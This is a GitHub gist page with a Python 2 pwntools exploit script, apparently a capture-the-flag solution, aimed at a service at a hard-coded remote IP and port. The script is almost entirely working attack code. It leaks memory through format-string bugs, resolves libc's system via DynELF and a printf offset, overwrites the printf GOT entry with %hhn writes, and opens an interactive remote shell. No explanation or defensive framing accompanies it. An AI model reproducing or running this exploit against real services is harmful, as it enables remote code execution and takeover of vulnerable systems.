Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import binascii
import pwn
import sys
import struct
RHOST = "78.46.224.86"
RPORT = 1337
saveSocket = None
def leakStringAt(s,address):
data = "%7$pBBBB" + pwn.p64(address)
if "\n" in data:
print " [!] newline in payload!"
return ""
try:
s.sendline("%7$sAAAA" + pwn.p64(address))
except EOFError:
raise EOFError
try:
data = p.recv()
print " [R] leaked %d bytes at %x" % (len(data.split("AAAA")[0]),address)
except EOFError:
print " [X] EOFError trying to leak from %x" % address
return None
(code,fuck) = data.split("AAAA")
return code
def leakFour(address):
global saveSocket
try:
data = leakBlock(saveSocket,address,4)[0:4]
print binascii.hexlify(data)
return str(data)
except:
return ''
def leakStack(s,start,end):
out = ""
for i in range(start,end):
out += "%%%d$p" % i
s.sendline(out)
print s.recv()
def leakStackPivot(s):
for i in range(1,1000):
s.sendline("AAAA%4n%" + str(i) + "$p")
data = p.recv()
if "0004" in data:
print " [!] MAYBE FOUND! offset %d : %s" % (i,data)
else:
print " [+] offset %d : %s" % (i,data)
def leakBlock(s,address,size):
remainingSize = size
out = bytearray("")
while remainingSize > 0:
try:
data = leakStringAt(s,address + size - remainingSize)
except EOFError:
return out
if data == None:
remainingSize -= 1
else:
out += bytearray(data)
remainingSize -= len(data) + 1
out += bytearray("\x00")
return out
def send_payload(payload):
print repr("AAAA"+payload)
saveSocket.sendline("AAAA" + payload)
data = saveSocket.recv()
print repr(data)
return data
def leakSystem(s):
d = pwn.DynELF(leakFour,0x400400)
system_addr = d.lookup('system','libc')
print "SYSTEM at 0x%x" % system_addr
return system_addr
def pad255(string):
return string + "A" * (256 - len(string))
def convertToMagic(address):
data = struct.pack("<q",address)
totalDataWritten = 0
out = ""
for i in range(0,len(data)):
newvalue = ord(data[i])
if newvalue < totalDataWritten:
newvalue = 256 - totalDataWritten + newvalue
out += "%" + str(newvalue) + "c" + "%" + str(38 + i) + "$hhn"
totalDataWritten = 0
elif newvalue == 0:
pass
elif newvalue == totalDataWritten:
out += "%" + str(38 + i) + "$hhn"
newvalue = 0
else:
out += "%" + str(newvalue - totalDataWritten) + "c" + "%" + str(38 + i) + "$hhn"
totalDataWritten += newvalue
totalDataWritten %= 256
print out
return out
if __name__ == "__main__":
if len(sys.argv) == 4 and sys.argv[1] == "leakstack":
p = pwn.remote(RHOST,RPORT)
leakStack(p,int(sys.argv[2],0),int(sys.argv[3],0))
p.close()
sys.exit(0)
elif len(sys.argv) == 2 and sys.argv[1] == "pivot":
p = pwn.remote(RHOST,RPORT)
leakStackPivot(p)
p.close()
sys.exit(0)
elif len(sys.argv) == 2 and sys.argv[1] == "dynelf":
p = pwn.remote(RHOST,RPORT)
saveSocket = p
data = leakBlock(p,0x00601018,8)
d = leakSystem(p)
print "PRINTF at : " + binascii.hexlify(data)
# PRINTF ACTUAL: 7f44671dd550
# SYSTEM ACTUAL: 7f44671cc6d0
# DIFF: 10e80
p.close()
sys.exit(0)
elif len(sys.argv) == 2 and sys.argv[1] == "exploit": # this is the right way to do it
p = pwn.remote(RHOST,RPORT)
data = leakBlock(p,0x601018,8)
printf_addr = struct.unpack("<q",data)
print " PRINTF AT 0x%x" % printf_addr
system_addr = printf_addr[0] - 0x10e80
print " SYSTEM AT 0x%x" % system_addr
print " [!!!] stage 1 complete. try to write 0x%x to 0x601018" % system_addr
pwn.context.clear(arch='amd64')
saveSocket = p
f = pwn.FmtStr(execute_fmt=send_payload,offset=7)
fmt_payload = pwn.fmtstr_payload(38, {0x601018: system_addr})
fmt_new = "%".join(fmt_payload.split("%")[1:])
print " [!] autogen payload = " + fmt_new
# f.write(0x601018,system_addr)
# f.execute_writes()
GOT_ADDR_BLOCK = "\x18\x10\x60\x00\x00\x00\x00\x00\x19\x10\x60\x00\x00\x00\x00\x00\x1a\x10\x60\x00\x00\x00\x00\x00\x1b\x10\x60\x00\x00\x00\x00\x00\x1c\x10\x60\x00\x00\x00\x00\x00\x1d\x10\x60\x00\x00\x00\x00\x00\x1e\x10\x60\x00\x00\x00\x00\x00\x1f\x10\x60\x00\x00\x00\x00\x00"
PAYLOAD_BLOCK = convertToMagic(system_addr)
payload_firsttoken = [PAYLOAD_BLOCK.split("c")[0]]
autogen_tokens = fmt_new.split("c")[1:]
newmagic = "c".join(payload_firsttoken + autogen_tokens)
print newmagic
print " [!!!] sending magic\n"
p.sendline(pad255(newmagic) + GOT_ADDR_BLOCK)
print p.recv()
p.interactive()
p.close()
sys.exit(0)
elif len(sys.argv) == 4 and sys.argv[1] == "leak":
address = int(sys.argv[2],0)
size = int(sys.argv[3],0)
p = pwn.remote(RHOST,RPORT)
data = leakBlock(p,address,size)
f = open("%08x.elf" % address,"wb")
f.write(data)
f.close()
# print binascii.hexlify(data)
print pwn.disasm(data,arch='amd64',vma=address)
p.close()
sys.exit(0)
else:
print "what do you want?>"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.